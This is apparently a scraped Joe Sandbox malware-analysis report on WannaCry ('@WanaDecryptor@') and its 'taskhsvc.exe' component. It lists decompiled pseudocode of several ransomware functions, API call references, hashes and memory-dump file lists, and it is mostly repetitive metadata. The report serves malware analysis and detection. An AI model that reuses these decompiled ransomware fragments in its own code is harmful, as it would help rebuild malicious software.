Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379$CursorEventMouseTrack
String ID:
API String ID: 2186836335-0
Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}

APIs

#2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
#2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
#800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
#641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#641#800
String ID:
API String ID: 2580907805-0
Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}

APIs

#2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
#800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
#800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
#795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#2414#795
String ID:
API String ID: 932896513-0
Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}

APIs

#825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
#825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56

Strings

j'@, xrefs: 00402E00, 00402E7A

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825
String ID: j'@
API String ID: 41483190-370697233
Opcode ID: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
Opcode Fuzzy Hash: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}

0x00407650
0x0040765c
0x00407675
0x00407677
0x0040767f
0x00407688
0x0040768d
0x0040767f
0x00407692
0x00407698
0x0040765e
0x00407660
0x00407667
0x0040766d
0x0040766d

APIs

#2379.MFC42 ref: 00407692

Part of subcall function 004076A0: time.MSVCRT ref: 004076DA

#2379.MFC42(00000001), ref: 00407667

Strings

Wana Decrypt0r 2.0, xrefs: 00407683

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379$time
String ID: Wana Decrypt0r 2.0
API String ID: 2017816395-4201229886
Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: taskhsvc.exePID: 3644, Parent PID: 8616COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	267

Executed Functions

Function 00D911FD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 157
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00D91285
malloc.MSVCRT ref: 00D9134A
strlen.MSVCRT ref: 00D9136A
malloc.MSVCRT ref: 00D91375
memcpy.MSVCRT ref: 00D91391
_cexit.MSVCRT ref: 00D913FF
_amsg_exit.MSVCRT ref: 00D9142B
_initterm.MSVCRT ref: 00D9144D

Strings

2Y#, xrefs: 00D91279
:[#, xrefs: 00D913B1

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID: 2Y#$:[#
API String ID: 2574462208-2722984323
Opcode ID: bffa04a3b58b78b564bc3819c674ab7d40d340e02111c3ab6b9cbe565fd3a51a
Instruction ID: 56110e10796812341713365df1b4a2e3e7c4ea1601faf9f14ba34718481c8adc
Opcode Fuzzy Hash: bffa04a3b58b78b564bc3819c674ab7d40d340e02111c3ab6b9cbe565fd3a51a
Instruction Fuzzy Hash: FB5189B4A043428FDF20EFA8D582769B7F0FB48344F08442CE9C497355D73A9844DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DBC647 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

abort.MSVCRT ref: 00DBC6C4
abort.MSVCRT ref: 00DBC703
abort.MSVCRT ref: 00DBC742
__stack_chk_fail.LIBSSP-0 ref: 00DBCB59

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DBC9EF
connect.WS2_32 ref: 00DBCA38

Strings

in progress, xrefs: 00DBCACB
3', xrefs: 00DBCA65
established, xrefs: 00DBCAD2

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort$strrchr$connect
String ID: 3'$established$in progress
API String ID: 353539820-3736937903
Opcode ID: 7ea4f86e935e3005424fc8f6ccbd316e342fbd50661696bcabaadc81a48170c3
Instruction ID: bde635f10515b4a00f58633cc14b69153449f373df38820e59611e2fffd96dd3
Opcode Fuzzy Hash: 7ea4f86e935e3005424fc8f6ccbd316e342fbd50661696bcabaadc81a48170c3
Instruction Fuzzy Hash: A9E1E4B4908349DFDB00EFAAC5896AEBBF0BF44304F10981DE499AB351D7789944DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DBB015 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

abort.MSVCRT ref: 00DBB5FE
memcpy.MSVCRT ref: 00DBB6C7

Part of subcall function 00EE919B: strerror.MSVCRT ref: 00EE91ED
Part of subcall function 00EE919B: __stack_chk_fail.LIBSSP-0 ref: 00EE91FD

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

__stack_chk_fail.LIBSSP-0 ref: 00DBB8E9

Strings

G', xrefs: 00DBB1D8
), xrefs: 00DBB32E
@', xrefs: 00DBB3DE

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
